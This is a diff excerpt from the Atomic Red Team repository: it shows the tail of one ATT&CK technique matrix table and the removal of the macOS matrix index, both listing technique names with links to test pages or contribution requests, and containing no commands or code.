| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
atomics/Indexes/Matrices/macos-matrix.md
-96
View File
@@ -1,96 +0,0 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
